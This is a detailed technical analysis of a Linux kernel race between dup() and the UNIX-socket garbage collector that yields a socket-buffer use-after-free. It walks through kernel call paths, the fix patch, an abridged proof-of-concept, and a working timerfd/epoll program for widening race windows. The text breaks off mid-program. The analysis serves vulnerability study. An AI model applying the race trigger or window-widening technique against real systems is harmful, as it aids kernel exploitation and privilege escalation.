Overview
Original article: Racing against the clock — hitting a tiny kernel race window
- Part.1: a brief explanation of the vulnerability
- Part.2: extra detail on the points that are easy to get confused about
- Part.3: analysis of the techniques the article uses to improve the race odds
Part.1
The bug & race
The kernel tries to figure out whether it can account for all references to some file by comparing the file’s refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.
The problem is that struct file can also be referenced from an RCU read-side critical section (which you can’t detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu()/get_file_rcu_many() by __fget_files() as long as the refcount is non-zero.
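The upgrade primitive is essentially an "add unless zero" on the refcount. Below is a minimal userspace sketch of that pattern (my simplification using C11 atomics, not the kernel's actual get_file_rcu_many()); the point is that unix_gc()'s file_count() read can land anywhere relative to this CAS loop, which is exactly the race.
```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

/* Sketch of an "add unless zero" refcount take, modelled on what
 * get_file_rcu_many() does via atomic_long_add_unless(): the
 * reference is only taken while the count is still non-zero. */
static bool ref_get_unless_zero(atomic_long *count, long refs)
{
    long c = atomic_load(count);
    while (c != 0) {
        /* on failure, c is reloaded with the current value */
        if (atomic_compare_exchange_weak(count, &c, c + refs))
            return true;   /* reference taken */
    }
    return false;          /* count already dropped to zero */
}

int main(void)
{
    atomic_long f_count = 1; /* like a file referenced by a single fd */
    printf("take: %d, count now %ld\n",
           ref_get_unless_zero(&f_count, 1), atomic_load(&f_count));
    return 0;
}
```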
- The intended logic of unix_gc(): if total_refs and inflight_refs are equal, the file can be considered exclusively owned at that moment, so the skb and the file can be freed together.
- In the code below, the race is won if (3) executes between (1) and (2).
- If the race is lost, __fget_files() sees that f_count is 0 or that the file is NULL.
- If the race is won, file->f_count gets incremented in __fget_files(), so the code later in unix_gc() does not free the file's memory and merely decrements f_count by 1. This also means dup() can still succeed after close().
dup() -> __fget_files()
file = files_lookup_fd_rcu(files, fd); // fdt->fd[fd] (1)
...
get_file_rcu_many(file, refs) // update: f_count+1 (2)
close() -> unix_gc()
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
total_refs = file_count(u->sk.sk_socket->file); // read f_count: 1 (3)
inflight_refs = atomic_long_read(&u->inflight); // inflight_refs: 1
...
if (total_refs == inflight_refs) { // compare
list_move_tail(&u->link, &gc_candidates);
...
What is the impact of unix_gc() not freeing the file and the skb in sync?
The following sequence can trigger an skb UAF:
socketpair() // get a socket pair, fds: 3, 4
sendmsg(4, 3) // send fd 3 over fd 4
-> skb_queue_tail(&other->sk_receive_queue, skb); // other is fd 4's peer, i.e. fd 3; the skb carries what fd 4 sent, which is also fd 3
close(3) | dup(3) // close and dup race; if dup wins the race, it returns a duplicate of fd 3
recvmsg(3) // receive the skb sent by fd 4 via fd 3
-> last = skb = skb_peek(&sk->sk_receive_queue); // at this point the skb's memory has already been freed
skb uaf:
- allocated in:
sendmsg() -> unix_stream_sendmsg()
- freed in:
close() -> unix_gc()
- uafed in:
recvmsg() -> unix_stream_read_generic()
Part.2
SCM_RIGHTS unix socket
SCM_RIGHTS is a socket control message used for passing file descriptors between processes over a UNIX domain socket. It allows a process to send an open file descriptor to another process, which can then use the file descriptor to read or write the same file or device.
- example
- sender.c
```c
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/un.h>
int main(int argc, char *argv[]) {
if (argc < 2) {
printf("Usage: %s <file_path>\n", argv[0]);
return 1;
}
char *file_path = argv[1];
int sock = socket(AF_UNIX, SOCK_STREAM, 0);
if (sock == -1) {
perror("socket");
return 1;
}
struct sockaddr_un addr;
memset(&addr, 0, sizeof(addr));
addr.sun_family = AF_UNIX;
strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);
if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
perror("connect");
return 1;
}
int fd = open(file_path, O_RDONLY);
if (fd == -1) {
perror("open");
return 1;
}
struct msghdr msg = {0};
char buf[CMSG_SPACE(sizeof(fd))];
memset(buf, 0, sizeof(buf));
struct iovec io = { .iov_base = "hello", .iov_len = 5 };
msg.msg_iov = &io;
msg.msg_iovlen = 1;
msg.msg_control = buf;
msg.msg_controllen = sizeof(buf);
struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
*((int *) CMSG_DATA(cmsg)) = fd;
if (sendmsg(sock, &msg, 0) == -1) {
perror("sendmsg");
return 1;
}
close(fd);
close(sock);
return 0;
}
```
- recver.c
```c
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/un.h>
int main(int argc, char *argv[]) {
int sock = socket(AF_UNIX, SOCK_STREAM, 0);
if (sock == -1) {
perror("socket");
return 1;
}
struct sockaddr_un addr;
memset(&addr, 0, sizeof(addr));
addr.sun_family = AF_UNIX;
strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);
unlink(addr.sun_path); // remove a stale socket file from a previous run
if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
perror("bind");
return 1;
}
if (listen(sock, 1) == -1) {
perror("listen");
return 1;
}
int client_sock = accept(sock, NULL, NULL);
if (client_sock == -1) {
perror("accept");
return 1;
}
char buf[256];
struct iovec io = { .iov_base = buf, .iov_len = sizeof(buf) };
struct msghdr msg = {
.msg_iov = &io,
.msg_iovlen = 1
};
char control[CMSG_SPACE(sizeof(int))];
msg.msg_control = control;
msg.msg_controllen = sizeof(control);
if (recvmsg(client_sock, &msg, 0) == -1) {
perror("recvmsg");
return 1;
}
struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
if (cmsg == NULL || cmsg->cmsg_type != SCM_RIGHTS) {
printf("Invalid message\n");
return 1;
}
int fd = *((int *) CMSG_DATA(cmsg));
if (fd == -1) {
perror("No file descriptor received");
return 1;
}
// Do something with the received file descriptor
char buf2[256];
ssize_t bytes_read;
while ((bytes_read = read(fd, buf2, sizeof(buf2))) > 0) {
fwrite(buf2, 1, bytes_read, stdout); // buf2 is not NUL-terminated, so write exactly bytes_read
}
close(fd);
close(client_sock);
close(sock);
return 0;
}
```
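To try the pair: start recver first (it binds and listens on /tmp/file_transfer.sock), then run sender <file_path>; recver prints the file's contents through the descriptor it received, demonstrating that the fd crossed the process boundary.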
Unix socket sendmsg() and recvmsg()
- The main functions that handle sending and receiving SCM_RIGHTS unix socket data are unix_stream_sendmsg and unix_stream_read_generic.
- What is special about them:
  - sendmsg creates an skb and puts it on the global gc_inflight_list as well as on the receiver's sk_receive_queue
  - the file of each fd being sent is bound to the skb (and its f_count is incremented)
  - recvmsg takes the skb off sk_receive_queue
  - unix_gc takes skbs off gc_inflight_list
// net/socket.c
sendmsg() -> __sys_sendmsg() -> sock_sendmsg() -> sock_sendmsg_nosec()
  -> // sock->ops->sendmsg
  unix_stream_sendmsg() // struct unix_stream_ops
    __scm_send()
      scm_fp_copy()
        fget_raw(fd)
          ...
          __fget_files() // takes one extra reference per fd being passed
    other = unix_peer(sk);
    skb = sock_alloc_send_pskb()
    unix_scm_to_skb()
      unix_attach_fds() // bind the fds to the skb
        unix_inflight()
          list_add_tail(&u->link, &gc_inflight_list); // the list unix_gc processes
      skb->destructor = unix_destruct_scm; // register the skb destructor
    skb_queue_tail(&other->sk_receive_queue, skb); // queue the skb directly on the peer's sk_receive_queue
recvmsg() -> __sys_recvmsg() -> ...
  -> // sock->ops->recvmsg
  unix_stream_recvmsg()
    unix_stream_read_generic()
      last = skb = skb_peek(&sk->sk_receive_queue); // take the skb
      scm_recv() // handle the fds
        scm_detach_fds()
          receive_fd_user() // install the received fd
            ...
            fd_install(new_fd, get_file(file));
          __scm_destroy() // drop the references the skb held on the fds
            fput()
              fput_many()
How do struct sk_buff *skb, struct unix_sock *u, struct socket *sock, struct sock *sk, and struct file *file relate to each other?
struct socket *sock = &container_of(file->f_inode,
struct socket_alloc, vfs_inode)->socket
struct sock *sk = sock->sk
struct unix_sock *u = (struct unix_sock *)sk
struct file *file = u->sk.sk_socket->file
struct file *file = (*(struct unix_skb_parms *)&((skb)->cb)).fp->fp[i]
What does unix_gc() do?
- Walk gc_inflight_list to get the unix_sock objects, and move the qualifying ones onto gc_candidates.
  - Condition: the unix_sock's file refcount equals its inflight skb refcount.
- Walk gc_candidates and add the qualifying skbs to hitlist.
- Free the skbs on hitlist together with the struct file bound to each of them.
unix_gc()
struct sk_buff_head hitlist;
...
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
total_refs = file_count(u->sk.sk_socket->file);
inflight_refs = atomic_long_read(&u->inflight);
if (total_refs == inflight_refs) {
list_move_tail(&u->link, &gc_candidates);
}
...
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_inflight, &hitlist);
scan_inflight(&u->sk, func, hitlist);
__skb_queue_tail(hitlist, skb);
...
__skb_queue_purge(&hitlist);
kfree_skb(skb);
Where are the file and the skb freed in unix_gc()?
unix_gc()
  ...
  skb_queue_head_init(&hitlist);
  list_for_each_entry(u, &gc_candidates, link) // collect skbs from gc_candidates into hitlist
    scan_children(&u->sk, inc_inflight, &hitlist);
      scan_inflight(&u->sk, func, hitlist);
        __skb_queue_tail(hitlist, skb);
  ...
  __skb_queue_purge(&hitlist); // (4)
    kfree_skb(skb);
      ...
      skb->destructor() // set during sendmsg
        unix_destruct_scm()
          scm_destroy()
            __scm_destroy()
              fput() // if f_count is 1, it drops to 0 and the file is freed
      kfree_skbmem()
        kmem_cache_free(.., skb) // free the skb
// unix_destruct_scm is registered during sendmsg
sendmsg()
  __sys_sendmsg()
    sock_sendmsg()
      sock_sendmsg_nosec()
        unix_stream_sendmsg() // struct unix_stream_ops
          skb = sock_alloc_send_pskb()
          unix_scm_to_skb()
            skb->destructor = unix_destruct_scm;
When is unix_gc() called?
- close() can trigger it indirectly; the actual entry point is syscall_exit_to_user_mode() -> __fput()
- sendmsg() can also trigger it, but only when the inflight queue is full: sendmsg() -> wait_for_unix_gc()
// triggered when close()-ing a file whose f_count is 1
close()
close_fd()
filp_close()
fput()
fput_many(file, 1);
atomic_long_sub_and_test(refs, &file->f_count)
init_task_work(&file->f_u.fu_rcuhead, ____fput)
task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)
entry_SYSCALL_64
do_syscall_64
syscall_exit_to_user_mode
...
tracehook_notify_resume
task_work_run()
__fput()
sock_close() // (struct file *) ->f_op->release()
__sock_release()
unix_release() // (struct socket *) ->ops->release()
unix_release_sock()
unix_gc()
// only called when inflight sockets exceed UNIX_INFLIGHT_TRIGGER_GC (16000)
sendmsg()
  ...
  unix_stream_sendmsg()/unix_dgram_sendmsg()
    wait_for_unix_gc()
      if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
        unix_gc();
What does dup() do and how is it implemented?
- Look up struct file *file in the fd table by fd
- If f_count is not 0, do file->f_count += 1
- Create a new entry in the fd table that points at the file
SYSCALL_DEFINE1(dup, unsigned int, fildes)
  fget_raw()
    __fget(fd, FMODE_PATH, 1)
      __fget_files(current->files, fd, mask, refs)
        file = files_lookup_fd_rcu(files, fd); // look up struct file *file in the fd table by fd
        get_file_rcu_many(file, refs)
          atomic_long_add_unless(&(x)->f_count, (cnt), 0) // if not 0, file->f_count += cnt
  get_unused_fd_flags()
  fd_install() // create a new fd table entry pointing at the file
What does close() do and how is it implemented?
- Make the fd available for reuse
- Remove the fd's entry from the fd table (set it to NULL)
- Decrement f_count of the struct file the entry pointed to; if it drops to 0, free the struct file's memory
- close does not necessarily free the struct file immediately, but userspace can no longer access the fd afterwards, e.g. via dup(fd) or read(fd)
close()
  close_fd()
    pick_file()
      fdt = files_fdtable(files);
      file = fdt->fd[fd];
      rcu_assign_pointer(fdt->fd[fd], NULL); // remove the fd's entry from the fd table
      __put_unused_fd(files, fd); // make the fd available for reuse
    filp_close()
      fput()
        fput_many(file, 1); // drop the f_count reference the fd table entry held
          atomic_long_sub_and_test(refs, &file->f_count)
          init_task_work(&file->f_u.fu_rcuhead, ____fput)
          task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)
____fput()
  __fput()
    file_free()
      file_free_rcu()
        kmem_cache_free(filp_cachep, f) // free the struct file if the count dropped to 0
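For contrast with the bug, here is a small userspace sketch (mine, assuming any readable path such as /etc/hostname) of the semantics close() is supposed to guarantee: once the fd table entry is gone, dup(fd) fails with EBADF, while a descriptor duplicated beforehand still keeps the struct file alive. The race makes dup() on a closed fd succeed instead.
```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
    int fd = open("/etc/hostname", O_RDONLY); // any readable file works
    int kept = dup(fd);   // second fd table entry; f_count is now 2
    close(fd);            // entry removed; f_count drops back to 1

    if (dup(fd) == -1 && errno == EBADF)
        printf("dup() on the closed fd fails with EBADF, as expected\n");

    char buf[16];
    ssize_t n = read(kept, buf, sizeof(buf)); // struct file is still alive
    printf("read via the kept fd: %zd bytes\n", n);
    close(kept);
    return 0;
}
```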
How does the PoC work once the kernel delay patch is added?
- Line 27 bumps pair[0]'s f_count by 1 and adds it to gc_inflight_list and to the peer's sk_receive_queue
- Lines 29 and 43 exist to trigger the unix_gc() call, since a fd whose f_count is 1 needs to be close()d
- Line 36 waits for resurrect_fn() -> dup() -> __fget_files() to enter the race window and grab the struct file, because line 37 removes pair[0] from the fd table. The usleep of 100000 us must be shorter than the kernel patch's 500 ms
- Line 43 executes unix_gc() while __fget_files() is stalled; when it reaches the code that is about to free the skb, it in turn waits for the dup() on line 11 to complete
- Once dup() completes and execution reaches the recvmsg() on line 16, the kernel waits for the unix_gc() triggered by line 43 to finish freeing the skb
- When unix_gc() finishes, recvmsg() resumes and picks up the freed skb: UAF
Abridged PoC:
1 void send_fd(int sock, int fd) {
2 ...
3 sendmsg(sock, &msg, 0);
4 }
5
6 int resurrect_fd = -1;
7 int resurrected_fd = -1;
8
9 void *resurrect_fn(void *arg) {
10 prctl(PR_SET_NAME, "SLOW-ME"); // tell kernel to inject mdelay()
11 resurrected_fd = dup(resurrect_fd);
12 prctl(PR_SET_NAME, "resurrect");
13
14 prctl(PR_SET_NAME, "SLOW-RECV");
15 ...
16 int recv_bytes = recvmsg(resurrected_fd, &msg, MSG_DONTWAIT);
17 prctl(PR_SET_NAME, "resurrect");
18
19 return NULL;
20 }
21
22 int main(void) {
23 /* create socketpair */
24 int pair[2];
25 socketpair(AF_UNIX, SOCK_STREAM, 0, pair);
26
27 send_fd(pair[1], pair[0]);
28
29 int trigger_sock = socket(AF_UNIX, SOCK_DGRAM, 0);
30
31 resurrect_fd = pair[0];
32
33 pthread_t resurrect_thread;
34 pthread_create(&resurrect_thread, NULL, resurrect_fn, NULL);
35
36 usleep(100000); /* wait for fget_raw() to see pointer */
37 close(pair[0]);
38
39 /*
40 * trigger unix GC; has to read file_count() before file inc
41 * but do hitlist kill after file inc
42 */
43 close(trigger_sock);
44
45 /* make sure dup() has really finished */
46 pthread_join(resurrect_thread, NULL);
47
48 }
The kernel patch adds three mdelay() calls:
@@ -850,6 +852,13 @@ static struct file *__fget_files(struct files_struct *files, unsigned int fd,
loop:
file = files_lookup_fd_rcu(files, fd);
if (file) {
+ if (strcmp(current->comm, "SLOW-ME") == 0) {
+ pr_warn("slowing lookup of fd %u to file 0x%lx with %ld refs\n",
+ fd, (unsigned long)file, file_count(file));
+ mdelay(500);
+ pr_warn("slowed lookup of fd %u to file 0x%lx with %ld refs\n",
+ fd, (unsigned long)file, file_count(file));
+ }
...
@@ -2631,6 +2633,12 @@ static int unix_stream_read_generic(struct unix_stream_read_state *state,
last = skb = skb_peek(&sk->sk_receive_queue);
last_len = last ? last->len : 0;
+ if (strcmp(current->comm, "SLOW-RECV") == 0) {
+ pr_warn("recvmsg: delaying stream receive\n");
+ mdelay(500);
+ pr_warn("recvmsg: delayed stream receive\n");
+ }
+
...
@@ -210,8 +212,11 @@ void unix_gc(void)
...
skb_queue_head_init(&hitlist);
+ if (strcmp(current->comm, "resurrect") == 0) {
+ pr_warn("unix: delaying hitlist setup\n");
+ mdelay(500);
+ pr_warn("unix: hitlist setup delay done\n");
+ }
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_inflight, &hitlist);
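Note that the patch keys each delay off the calling task's comm: that is why the PoC brackets its racing calls with prctl(PR_SET_NAME, ...), using "SLOW-ME" to stall __fget_files(), "SLOW-RECV" to stall unix_stream_read_generic(), and a task named "resurrect" to hit the delay before unix_gc() builds its hitlist.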
How does the fix patch work?
- Effect of the patch: during the race window, if the fd's struct file has already been removed from the fd table, the f_count increment is rolled back; if the rollback drops the count to 0, the struct file is released right away.
diff --git a/fs/file.c b/fs/file.c
index 8627dacfc4246..ad4a8bf3cf109 100644
--- a/fs/file.c
+++ b/fs/file.c
@@ -858,6 +858,10 @@ loop:
file = NULL;
else if (!get_file_rcu_many(file, refs))
goto loop;
+ else if (files_lookup_fd_raw(files, fd) != file) {
+ fput_many(file, refs);
+ goto loop;
+ }
}
rcu_read_unlock();
Part.3
How can hrtimer be used to boost the race success rate?
- timerfd_create + timerfd_settime can fire a timer interrupt after a specified time (in nanoseconds)
- The timer interrupt handler calls __wake_up_common, which walks the wait queue and runs each callback. The longer the wait queue, the longer the CPU stays in interrupt context
- This can be used to interrupt a process right inside the race window, while the process it races against runs on another CPU
Where are wait queue entries added and consumed?
- Each EPOLL_CTL_ADD adds an entry that runs ep_poll_callback to the timer fd's wait queue
- timerfd_triggered takes the entries off the timer fd's wait queue
// epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], ...)
do_epoll_ctl() // adds a wait_queue_entry in ep_ptable_queue_proc
  ep_insert(struct eventpoll *ep, ..
    struct ep_pqueue epq;
    init_poll_funcptr(&epq.pt, ep_ptable_queue_proc); // epq.pt._qproc = ep_ptable_queue_proc
    ep_item_poll(epi, &epq.pt, 1);
      vfs_poll
        timerfd_poll // struct file_operations timerfd_fops.poll
          struct timerfd_ctx *ctx = file->private_data;
          poll_wait(file, &ctx->wqh, wait); // &ctx->wqh: whead, wait: &epq.pt (include/linux/poll.h)
            ep_ptable_queue_proc(struct file *file, wait_queue_head_t *whead, poll_table *pt)
              struct epitem *epi = ep_item_from_epqueue(pt);
              struct eppoll_entry *pwq;
              ...
              pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);
              ...
              init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);
              ...
              add_wait_queue(whead, &pwq->wait); // whead: &ctx->wqh
              ...
struct ep_pqueue {
poll_table pt;
struct epitem *epi;
}
struct poll_table_struct {
poll_queue_proc _qproc; // void (*)(struct file *, wait_queue_head_t *, struct poll_table_struct *)
__poll_t _key;
}
local_apic_timer_interrupt()
  hrtimer_interrupt()
    ...
    timerfd_tmrproc()
      timerfd_triggered()
        spin_lock_irqsave(&ctx->wqh.lock, flags); // interrupts off
        ctx->expired = 1;
        ctx->ticks++;
        wake_up_locked_poll(&ctx->wqh, EPOLLIN);
          __wake_up_common() // walk the wait queue and run each callback
            wait_queue_entry_t *curr, *next;
            list_for_each_entry_safe_from(curr, next, &wq_head->head, entry)
              ret = curr->func(curr, mode, wake_flags, key); // ep_poll_callback
        spin_unlock_irqrestore(&ctx->wqh.lock, flags);
timerfd_tmrproc is set up in timerfd_setup
static int timerfd_setup(struct timerfd_ctx *ctx, int flags,
const struct itimerspec64 *ktmr)
..
hrtimer_init(&ctx->t.tmr, clockid, htmode);
hrtimer_set_expires(&ctx->t.tmr, texp);
ctx->t.tmr.function = timerfd_tmrproc;
How struct timerfd_ctx, struct file, and struct hrtimer relate to each other
struct timerfd_ctx *ctx = file->private_data;
struct hrtimer *htmr = &ctx->t.tmr;
struct timerfd_ctx *ctx = container_of(htmr, struct timerfd_ctx, t.tmr);
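The last line relies on the container_of() pattern: given a pointer to an embedded member, recover the enclosing struct. A self-contained userspace sketch (hypothetical struct names standing in for timerfd_ctx and its embedded hrtimer):
```c
#include <stddef.h>
#include <stdio.h>

/* trimmed-down stand-in for the kernel's container_of() */
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

struct ctx_sketch {            /* stands in for struct timerfd_ctx */
    int ticks;
    struct { long tmr; } t;    /* stands in for ctx->t.tmr (the hrtimer) */
};

int main(void)
{
    struct ctx_sketch ctx = { .ticks = 42 };
    long *htmr = &ctx.t.tmr;   /* the timer callback only receives this */
    struct ctx_sketch *back = container_of(htmr, struct ctx_sketch, t.tmr);
    printf("recovered ticks = %d\n", back->ticks); /* prints 42 */
    return 0;
}
```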
Test code: add 500 * 500 entries to the wait queue
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/epoll.h>
#include <sys/timerfd.h>
#include <sched.h>
#include <time.h>
#include <err.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
#define NUM_EPOLL_INSTANCES 500
#define NUM_DUP_FDS 500
#define NUM_TIMER_WAITERS (NUM_EPOLL_INSTANCES * NUM_DUP_FDS)
#define NSEC_PER_SEC 1000000000UL // 1s = 1000000000ns
void pin_task_to(int pid, int cpu) {
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
void pin_to(int cpu) { pin_task_to(0, cpu); }
struct timespec get_mono_time(void) {
struct timespec ts;
clock_gettime(CLOCK_MONOTONIC, &ts);
return ts;
}
void ts_add(struct timespec *ts, unsigned long nsecs) {
ts->tv_nsec += nsecs;
if (ts->tv_nsec >= NSEC_PER_SEC) {
ts->tv_sec++;
ts->tv_nsec -= NSEC_PER_SEC;
}
}
int main() {
pin_to(0);
int timerfd = timerfd_create(CLOCK_MONOTONIC, 0);
if (timerfd < 0) {
perror("timerfd_create");
return 1;
}
// create the epoll instances
int epoll_fds[NUM_EPOLL_INSTANCES];
for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
epoll_fds[i] = epoll_create1(0);
if (epoll_fds[i] < 0) {
perror("epoll_create1");
return 1;
}
}
// dup timer fd
int timer_fds[NUM_DUP_FDS];
for (int i = 0; i < NUM_DUP_FDS; i++) {
timer_fds[i] = dup(timerfd);
if (timer_fds[i] < 0) {
perror("dup");
return 1;
}
}
// epoll_ctl EPOLL_CTL_ADD adds entries to the wait queue
struct epoll_event ev = { 0 };
ev.events = EPOLLIN;
for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
for (int j = 0; j < NUM_DUP_FDS; j++) {
ev.data.fd = timer_fds[j];
if (epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], &ev) < 0) {
perror("epoll_ctl");
return 1;
}
}
}
struct timespec base_time = get_mono_time();
struct itimerspec timer_value = { .it_value = base_time };
ts_add(&timer_value.it_value, 1000 * 1000 * 1000); // timer at +1s
if (timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &timer_value, NULL) < 0) {
perror("timerfd_settime");
return 1;
}
for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
int nfds = epoll_wait(epoll_fds[i], &ev, 1, -1);
if (nfds < 0) {
perror("epoll_wait");
return 1;
}
}
unsigned long value;
if (read(timerfd, &value, sizeof(value)) != sizeof(value))
perror("read");
printf("value: %lu\n", value);
for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
close(epoll_fds[i]);
}
for (int i = 0; i < NUM_DUP_FDS; i++) {
close(timer_fds[i]);
}
close(timerfd);
return 0;
}
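As configured, the timer is one-shot (it_interval is zero-initialized), so the value read back should be 1 expiration; what the experiment actually measures is how long the CPU spends inside timerfd_triggered() walking the 500 * 500 wait queue entries.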
How can the delay effect be observed?
In GDB you can inspect the entries on the queue; the count matches what was configured:
b timerfd_triggered
set $head = &ctx.wqh.head
set $node = $head
while $node.next != $head
p $node.next
set $node = $node.next
end
p *$head
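Each iteration of the loop prints one wait_queue_entry; with the settings above, the walk passes NUM_EPOLL_INSTANCES * NUM_DUP_FDS = 250000 nodes before wrapping back around to $head.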
With a small patch, rdtsc can be used to get a rough measurement of the delay:
0xffffffff81b8b67e <+49>: rdtsc
0xffffffff81b8b680 <+51>: shl rdx,0x20
0xffffffff81b8b684 <+55>: or rax,rdx
0xffffffff81b8b687 <+58>: lea r12,[rbx+0x88]
0xffffffff81b8b68e <+65>: mov r14,rax
0xffffffff81b8b691 <+68>: mov rdi,r12
0xffffffff81b8b694 <+71>: call 0xffffffff81bde9d0 <_raw_spin_lock_irqsave>
0xffffffff81b8b699 <+76>: inc QWORD PTR [rbx+0xa0]
0xffffffff81b8b6a0 <+83>: mov edx,0x1
0xffffffff81b8b6a5 <+88>: mov rdi,r12
0xffffffff81b8b6a8 <+91>: mov WORD PTR [rbx+0xac],0x1
0xffffffff81b8b6b1 <+100>: mov r13,rax
0xffffffff81b8b6b4 <+103>: mov esi,0x3
0xffffffff81b8b6b9 <+108>: call 0xffffffff810ad650 <__wake_up_locked_key>
0xffffffff81b8b6be <+113>: mov rsi,r13
0xffffffff81b8b6c1 <+116>: mov rdi,r12
0xffffffff81b8b6c4 <+119>: call 0xffffffff81bde5b0 <_raw_spin_unlock_irqrestore>
0xffffffff81b8b6c9 <+124>: rdtsc
diff --git a/fs/timerfd.c b/fs/timerfd.c
index e9c96a0c79f1..b919b24b4d48 100644
--- a/fs/timerfd.c
+++ b/fs/timerfd.c
@@ -64,11 +64,20 @@ static void timerfd_triggered(struct timerfd_ctx *ctx)
{
unsigned long flags;
+ u64 start_time, end_time;
+
+ pr_warn("[%s] %s enter\n", current->comm, __func__);
+
+ asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0"
+ : "=a"(start_time) :: "%rdx");
spin_lock_irqsave(&ctx->wqh.lock, flags);
ctx->expired = 1;
ctx->ticks++;
wake_up_locked_poll(&ctx->wqh, EPOLLIN);
spin_unlock_irqrestore(&ctx->wqh.lock, flags);
+ asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0"
+ : "=a"(end_time) :: "%rdx");
+ pr_warn("[%s] %s exit, %lld\n", current->comm, __func__, end_time - start_time);
}
When the system is running normally the cycle count is roughly 3000-30000; creating 500 * 500 entries increases the CPU time by 3-4 orders of magnitude (the test VM's CPU is a single core at 2000 MHz).
[ 1134.053250] [swapper/0] timerfd_triggered exit, 2976
[ 1134.053250] [swapper/0] timerfd_triggered enter
[ 1134.053250] [swapper/0] timerfd_triggered exit, 3970
[ 1134.552271] [swapper/0] timerfd_triggered enter
[ 1134.552906] [swapper/0] timerfd_triggered exit, 11616
[ 1175.552958] [swapper/0] timerfd_triggered enter
[ 1175.553871] [swapper/0] timerfd_triggered exit, 32663
[ 1176.052796] [swapper/0] timerfd_triggered enter
[ 1176.053719] [swapper/0] timerfd_triggered exit, 29340
[ 1184.738834] [swapper/0] timerfd_triggered enter
[ 1184.739757] [swapper/0] timerfd_triggered exit, 27116541 // 500 * 500
...
[ 1588.076916] [swapper/0] timerfd_triggered enter
[ 1588.077841] [swapper/0] timerfd_triggered exit, 28924883 // 500 * 500
...
[ 1596.735608] [swapper/0] timerfd_triggered enter
[ 1596.736503] [swapper/0] timerfd_triggered exit, 28029898 // 500 * 500
..
[ 1222.384483] [swapper/0] timerfd_triggered enter
[ 1222.385381] [swapper/0] timerfd_triggered exit, 8511668 // 100 * 500
...
[ 1265.026284] [swapper/0] timerfd_triggered enter
[ 1265.027208] [swapper/0] timerfd_triggered exit, 1202548 // 10 * 500
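At 2000 MHz, 28.9 million cycles works out to roughly 28.9e6 / 2.0e9 ≈ 14.5 ms spent in interrupt context for the 500 * 500 case, versus about 1.5-15 us (3000-30000 cycles) normally; the 100 * 500 and 10 * 500 runs scale down roughly linearly (~4.3 ms and ~0.6 ms).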
A way to observe where the code gets interrupted
From the appendix of the original article:
I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register
Implementation:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <ucontext.h>
#include <sys/time.h>
#include <sys/user.h>
#include <time.h>
#include <sched.h>
#include <err.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
void pin_task_to(int pid, int cpu) {
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
void pin_to(int cpu) { pin_task_to(0, cpu); }
void timer_handler(int signum, siginfo_t *info, void *context) {
ucontext_t *ucontext = (ucontext_t *) context;
void *pc = (void *) ucontext->uc_mcontext.gregs[REG_RIP];
long rax = ucontext->uc_mcontext.gregs[REG_RAX];
printf("Timer fired, PC = %p, rax: %ld\n", pc, rax);
}
int main() {
pin_to(0);
// Set up the signal handler for SIGALRM
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_flags = SA_SIGINFO;
sa.sa_sigaction = timer_handler;
sigaction(SIGALRM, &sa, NULL);
// Start the timer
struct itimerspec its;
its.it_interval.tv_sec = 0;
its.it_interval.tv_nsec = 10000000; // 100Hz
its.it_value = its.it_interval;
timer_t timerid;
